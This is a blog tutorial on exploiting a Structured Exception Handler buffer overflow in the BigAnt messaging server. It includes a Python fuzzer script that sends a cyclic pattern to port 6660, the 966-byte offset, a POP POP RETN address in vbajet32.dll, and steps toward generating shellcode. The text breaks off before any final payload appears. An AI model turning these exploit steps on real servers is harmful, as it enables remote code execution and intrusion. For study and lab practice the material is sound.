Information Security Shinobi: SEH : BigAnt Server Vulnerability Exploitation

Okey, after we learn about Non-SEH application exploitation, now we will to try exploit the application that have SEH or Structure Exception Handling. A little about SEH, SEH is a mechanism that is owned by a software and hardware to handle an exception. Exception will occur when an application tries to perform the execution of code that is outside the normal, for example in the case of buffer overflow.

Let's begin..

In this practice I use the BigAnt server application. BigAnt server is a server messaging application. This software built using SEH and linker SEH, that makes these applications is not easy to be exploited using direct RETN EIP like in case of WarFTP.

- Now, we will create a fuzzer to make an application error.

- After we create a fuzzer, now run the BigAnt server, and attach to OllyDbg. Be careful when attach the process, because there is 3 running process on BigAnt server, in this practice I try to attach AntServer that running on port 6660. Run the BigAnt server on OllyDbg.

- If the BigAnt server already running on OllyDbg, then run the fuzzer and look at the register log of Ollydbg.

- After the fuzzer run, the application crashes. But now the EIP register not overwritten by buffer of fuzzer.

Why this happen? Because the application using SEH that will catch the exception that happen to application. To look into SEH, select View -> SEH Chain. You will see the dialog box of SEH Chain like below.

- The buffer that send saved in SEH Chain. To pass the exception program from SEH Chain to memory, press shift+F9 key. See what happen! The EIP change to 414141

- In the bottom right of the OllyDbg windows, we can see that the fuzzer's data sent to the application also entered the stack memory. To see it right click on the stack line then click follow in dump.

And then, on the Window Memory dump OllyDbg will see the buffer in the memory like below.

- There are several ways to overcome with SEH protection, and the most popular is POP, POP, RETN method. But to protect from exploitation, Windows has other exception handler called safeSEH. Beside safeSEH, Windows also other protection, it is IMAGE_DLLCHARACHTERISTICS_NO_SEH.

There are 2 things to consider when overwrite the SEH address:
1. The module not compiled with safeSEH On.
2. The module didn't have or using flag IMAGE_DLLCHARACHTERISTICS_NO_SEH option.

- BigAnt server did'nt have dll module file inside the folder application, so the next step is to find the dll that not standard installed in Windows system.

- In this case we will use vbajet32.dll to overwrite SEH address. That located C:\Windows\system32\vbajet32.dll. To access this module just click View -> Executable modules.

- Then search the command POP, POP, RETN inside this module. After we located in Executables modules, double click on the vbajet32.dll file. After getting into window CPU of vbajet32.dll, then right click Search For -> Sequence of Commands

- Instert POP r32, POP r32, and RETN like below.

- And then OllyDbg will direct to memory address that have vbajet32.dll inside it.

- Okey, next we will try to find where byte the SEH overwriten. Like before, in here we use pattern_create to make string pattern that use to be buffer on the fuzzer.

Spoiler:

#!/usr/bin/pyhton import socket target="192.168.56.101" target_port=6660 buffer="USV " buffer=+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D" buffer+="\r\n\r\n" s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect((target,target_port)) s.send(buffer) print("Finish") s.close()

- Now re run the OllyDbg and BigAnt server then attach the AntServer proses to OllyDbg, then run the BigAnt from OlyDbg. After that run the fuzzer. The BigAnt server will crash, next press the shift+F9 to pass the exception.

- Note the value on the EIP register and check using pattern_offset.

- From the result we know that need 966 byte to trigger SEH handler. So, we must modify the fuzzer, change the value buffer to 966 byte.

- Re run the OllyDbg and BigAnt server. Attach the AntServer process and run the BigAnt from OllyDbg. Then run the fuzzer.

The application crash, and when we open the SEH Chain, we will see that the value buffer x41 succes successful entry into the SEH handler.

- Next, we will insert the offset address of vbajet32.dll that have POP, POP, RETN command into fuzzer. Dont forget to using little-endian format.

- Like alwasy, Re run the OllyDbg and BigAnt, attach the AntServer process, and run the BigAnt from OlluDbg. Before we run the fuzzer we set breakpoint on the memory address 0F9A196A to confirm is the exploit that made realy direct to the correct memory.

- Run the fuzzer and see what happen. The application crash, and when we open the SEH Chain, we get the result that process break when access to memory address 0F9A196A.

- Press shift+F9 to process into vbajet32.dll memory, then press shift+F9 again to process it into POP POP RETN command that located inside vbajet32.dll,and then press F7 until reach RETN command.

- There problem is space memory that available is just 4 byte. So, needed the other process to transfer to the location that has more space allocation. Rigth click on the first memory address xCC (012CFD7D) -> Follow in Dump -> Selection.

- When we see the result, we found there is still large free memory space (x90). That empty memory space can be used to set the shellcode.

- To process CPU to the empty space that contain a command to overwrite the SEH address we use command JMP SHORT. The JMP SHORT used to send a command for CPU to jump to next memory byte according to command that user want.

- Okey, next we will create a payload using msfweb.

Insert the restricted characters. There is an additional restricted characters, 0x20 and 0x25. This case will discussed in other post. After insert the restricted characters then generate the payload.